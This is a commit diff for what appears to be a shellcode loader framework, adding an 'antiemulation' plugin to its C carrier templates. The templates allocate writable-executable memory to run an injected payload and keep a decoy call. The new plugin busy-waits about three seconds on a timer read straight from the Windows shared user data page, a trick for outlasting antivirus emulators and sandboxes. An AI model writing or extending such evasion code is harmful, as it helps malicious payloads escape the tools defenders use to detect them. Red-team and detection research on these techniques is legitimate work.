feature: antiemulation in templates

data/source/carrier/alloc_rw_rwx/template.c

@@ -15,6 +15,9 @@ char *supermega_payload;
    * will set it to RWX (safe to run shellcodes, opsec-unsafe)
 */
 
+{{plugin_antiemulation}}
+
+
 int main()
 {
 	// Execution Guardrail: Env Check
@@ -29,6 +32,9 @@ int main()
 		return 6;
 	}
 
+	// Depends on plugin_antiemulation
+	antiemulation();
+
 	// Decoy
 	//WinExec("C:\\windows\\system32\\notepad.exe", 1);
 

data/source/carrier/alloc_rw_rx/template.c

@@ -8,6 +8,9 @@ char *supermega_payload;
 #define p_RX  0x20
 #define p_RWX 0x40
 
+
+{{plugin_antiemulation}}
+
 /* iat_reuse_rx
 
    Standard IAT reuse shellcode
@@ -29,6 +32,9 @@ int main()
 		return 6;
 	}
 
+	// Depends on plugin_antiemulation
+	antiemulation();
+
 	// Decoy
 	//WinExec("C:\\windows\\system32\\notepad.exe", 1);
 

data/source/carrier/antiemulation/none.c

@@ -0,0 +1,4 @@
+
+void antiemulation() {
+    // None
+}

data/source/carrier/antiemulation/timeraw.c

@@ -0,0 +1,20 @@
+
+int get_time_raw() {
+    ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
+    LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;
+    ULONG* PUserSharedData_LowPart = (PULONG)0x7ffe0320;
+    DWORD kernelTime = (*PUserSharedData_TickCountMultiplier) * (*PUserSharedData_High1Time << 8) +
+        ((*PUserSharedData_LowPart) * (unsigned __int64)(*PUserSharedData_TickCountMultiplier) >> 24);
+    return kernelTime;
+}
+
+
+int sleep_ms(DWORD sleeptime) {
+    DWORD start = get_time_raw();
+    while (get_time_raw() - start < sleeptime) {}
+}
+
+
+void antiemulation() {
+    sleep_ms(3000);
+}